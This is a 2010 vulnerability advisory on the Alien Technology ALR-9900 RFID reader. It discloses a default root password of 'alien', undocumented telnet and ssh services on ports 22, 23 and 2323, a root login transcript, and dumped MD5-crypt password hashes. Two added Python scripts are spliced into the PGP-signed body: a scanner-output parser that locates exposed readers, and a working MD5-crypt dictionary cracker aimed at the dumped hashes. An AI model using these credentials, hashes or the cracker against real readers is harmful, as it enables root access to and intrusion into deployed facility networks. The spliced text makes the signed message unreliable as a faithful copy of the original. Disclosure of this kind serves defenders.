SECURITYVULNS:DOC:23763

AlienTechnology ALR-9900 default root password and backdoor

2010-05-05 00:00:00
vulners.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Tested:
www.alientechnology.com/readers/alr9900.php

Background:
Alien Technology is a major RFID reader designer and manufacturer.
Alien's products are sold to many corporations and the military.
Alien's readers can be interfaced with in several ways, including
serial, the I/O port and the Ethernet port. Alien's readers run
several daemons that are reachable over Ethernet and completely
undocumented. We called Alien several times to ask them about these
undocumented services and were first deferred to technical support
and then had our numbers blocked. We then emailed them about the
security ramifications of these daemons and received no reply.

The Undocumented:
port 2323 - telnetd
port 23 - telnetd
port 22 - sshd

The Flaws:
default root password = 'alien'
alien account has same password across all readers
password hashes for root and alien are kept in the world-readable
/etc/passwd (the /etc/shadow dump below lists alien but not root)
port 2323 - provides a backdoor onto the readers for anyone who
knows the alien (or root) account password
port 23 - same
port 22 - same

The P.O.C:
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific Daylight Time

Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.000092s latency).
Not shown: 995 closed ports

PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
2323/tcp open unknown

MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds
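The scan above is the fingerprint a defender needs: an Alien Technology MAC vendor plus the 22/23/2323 trio. The following is an added example, not part of the advisory, that applies that fingerprint to a whole-subnet nmap -oN listing so every reader exposing the undocumented shell services can be inventoried. The scan text is constructed to mirror the output above (RFC 5737 addresses, made-up MACs, a non-Alien host for contrast); the host regex assumes IPv4 addresses.

```python
"""Triage nmap -oN output for Alien Technology readers that expose the
undocumented shell services (22, 23, 2323) described in the advisory."""
import re
from dataclasses import dataclass, field

# Ports the advisory lists as undocumented remote-shell services on the reader.
SHELL_PORTS = {22, 23, 2323}

# "Nmap scan report for 192.0.2.10" or "Nmap scan report for name (192.0.2.10)".
# Assumption: IPv4 targets only.
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9.]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\b")
MAC_RE = re.compile(r"^MAC Address: \S+ \((.*)\)$")


@dataclass
class Host:
    address: str
    vendor: str = ""
    open_ports: set = field(default_factory=set)

    @property
    def is_alien(self) -> bool:
        return "alien technology" in self.vendor.lower()

    @property
    def exposed_shell_ports(self) -> set:
        return self.open_ports & SHELL_PORTS


def parse_nmap(text: str) -> list:
    """Walk the -oN text and collect one Host per 'scan report' stanza."""
    hosts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            current = Host(m.group(1))
            hosts.append(current)
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current.open_ports.add(int(m.group(1)))
            continue
        m = MAC_RE.match(line)
        if m:
            current.vendor = m.group(1)
    return hosts


def flag_readers(text: str) -> list:
    """(address, sorted exposed shell ports) for every Alien host found."""
    return [(h.address, sorted(h.exposed_shell_ports))
            for h in parse_nmap(text) if h.is_alien and h.exposed_shell_ports]


# Constructed sample scan: one reader laid out like the advisory's nmap run,
# plus an unrelated printer so the filter has something to reject.
SAMPLE_SCAN = """\
Starting Nmap 5.21 ( http://nmap.org ) at 2010-05-05 00:00 PDT
Nmap scan report for 192.0.2.10
Host is up (0.000092s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
111/tcp  open  rpcbind
2323/tcp open  unknown
MAC Address: 00:11:22:33:44:55 (Alien Technology)

Nmap scan report for printer (192.0.2.20)
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
80/tcp  open  http
631/tcp open  ipp
MAC Address: 00:11:22:33:44:66 (Hewlett-Packard)

Nmap done: 2 IP addresses (2 hosts up) scanned in 1.20 seconds
"""

if __name__ == "__main__":
    for address, ports in flag_readers(SAMPLE_SCAN):
        print(f"{address}: Alien reader with shell services on {ports}")
```

Feed it the saved output of `nmap -oN scan.txt <subnet>` run from a host on the readers' segment; MAC vendor lines only appear when nmap is on the same broadcast domain, so a scan routed across a gateway will need another vendor check.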

login as: root
Using keyboard-interactive authentication.
Password: <- root
Access denied
Using keyboard-interactive authentication.
Password: <- password
Access denied
Using keyboard-interactive authentication.
Password: <- alien

Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX
root@alien-XXXXXX alien# id
uid=0(root) gid=0(root) groups=0(root)

root@alien-XXXXXX alien# cat /etc/passwd
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The Alien,18220,:/home/alien:/bin/bash

root@alien-XXXXXX alien# cat /etc/shadow
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::

Impact:
Alien's readers are deployed in many secure facilities, typically on
closed networks. Even on a closed network, these undocumented services
let any insider who knows (or guesses) the shared password log in as
root, modify reader settings and subvert the checkout systems the
readers feed. Those systems are often used to track valuable items,
which makes this a serious matter. Where the readers sit on an open or
large network, a root shell on an embedded Linux host with Ethernet is
an easy way to tunnel into the network or to attack it from an
unexpected location. Lastly, because the root and alien hashes are
stored in the world-readable /etc/passwd rather than only in
/etc/shadow, any local user or process on a reader can copy them and
crack them offline; and since the alien account's password is the same
on every reader, one cracked hash unlocks Alien's backdoor on all of
them.
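The hashes in the dump are MD5-crypt ($1$) values, so the offline attack the last sentence describes needs nothing beyond a wordlist and the algorithm. Below is an added example, not part of the advisory, that implements MD5-crypt following the published FreeBSD algorithm with hashlib only (so it runs where the deprecated crypt module is absent) and runs a dictionary check over passwd-style lines. The sample input reuses the two hash-bearing lines from the dump above and adds a constructed demo account whose password is set in the code; the wordlist is constructed from the three guesses in the login transcript. Whether the advisory's own hashes fall to that wordlist is left for the run to show, not asserted here.

```python
"""Offline dictionary check of the MD5-crypt ($1$) hashes the reader keeps in
world-readable /etc/passwd.  hashlib only, so it runs where the deprecated
crypt module is missing (e.g. Python 3.13, non-glibc platforms)."""
import hashlib
import re

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
# user:$1$salt$digest: ... ; MD5-crypt salts are 1-8 chars, digests 22 chars.
HASH_RE = re.compile(r"^([^:]+):(\$1\$[^$]{1,8}\$[./0-9A-Za-z]{22}):")


def _to64(value: int, count: int) -> bytes:
    """crypt(3)'s base-64 variant: `count` low-order 6-bit groups, LSB first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD/glibc MD5-crypt, the scheme behind the $1$ entries in the dump."""
    salt, magic = salt[:8], b"$1$"
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    n = len(password)
    while n > 0:                      # one byte of alt per password byte
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(password)
    while n > 0:                      # per-bit mixing of NUL or password[0]
        ctx.update(b"\0" if n & 1 else password[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):             # fixed 1000-round stretching
        ctx1 = hashlib.md5(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    f = final
    encoded = (_to64(f[0] << 16 | f[6] << 8 | f[12], 4)
               + _to64(f[1] << 16 | f[7] << 8 | f[13], 4)
               + _to64(f[2] << 16 | f[8] << 8 | f[14], 4)
               + _to64(f[3] << 16 | f[9] << 8 | f[15], 4)
               + _to64(f[4] << 16 | f[10] << 8 | f[5], 4)
               + _to64(f[11], 2))
    return (magic + salt + b"$" + encoded).decode()


def verify(stored: str, candidate: bytes) -> bool:
    """Recompute with the salt carried in the stored string and compare."""
    return md5crypt(candidate, stored.split("$")[2].encode()) == stored


def parse_passwd_hashes(passwd_text: str) -> dict:
    """user -> $1$ hash for every passwd line that still carries a hash."""
    found = {}
    for line in passwd_text.splitlines():
        m = HASH_RE.match(line.strip())
        if m:
            found[m.group(1)] = m.group(2)
    return found


def crack(hashes: dict, wordlist: list) -> dict:
    """user -> recovered password for every hash hit by the wordlist."""
    hits = {}
    for user, stored in hashes.items():
        for word in wordlist:
            if verify(stored, word):
                hits[user] = word.decode()
                break
    return hits


# Constructed sample: the two hash-bearing lines from the advisory's dump plus
# a demo account whose password is set here, so at least one result is known.
SAMPLE_PASSWD = "\n".join([
    "root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash",
    "sshd:x:100:65534::/var/run/sshd:/bin/false",
    "alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The Alien,18220,:"
    "/home/alien:/bin/bash",
    "demo:" + md5crypt(b"alien", b"kcyCMoEZ") + ":1001:1001::/home/demo:/bin/sh",
])
# Constructed wordlist: the three guesses the login transcript tries, in order.
WORDLIST = [b"root", b"password", b"alien"]

if __name__ == "__main__":
    for user, pw in crack(parse_passwd_hashes(SAMPLE_PASSWD), WORDLIST).items():
        print(f"{user}: {pw}")
```

Because /etc/passwd is readable by every account, the same check can be run by anyone who lands on a reader with any privilege at all; a hit on the alien hash is a hit on every reader that shares it, which is the fleet-wide point the advisory makes.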

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkvgptYACgkQPn8o33YUciG/QQQAkB6HDocLM3zd90K5lSN00sGZyaUc
0e5sraILohD4kk2rkSi/dfvZsrPq30nkMrGqrrgqH5sJTtQ6T24UWvfYUH32H8fGGPzN
Ay8w6R+x61IU/4TZYSCq6xZbdI9yhjfOiTi0vwV3xjuwdKul8Zc6c0e0ih8pULG4dAM8
ZXExxzM=
=Bb1k
-----END PGP SIGNATURE-----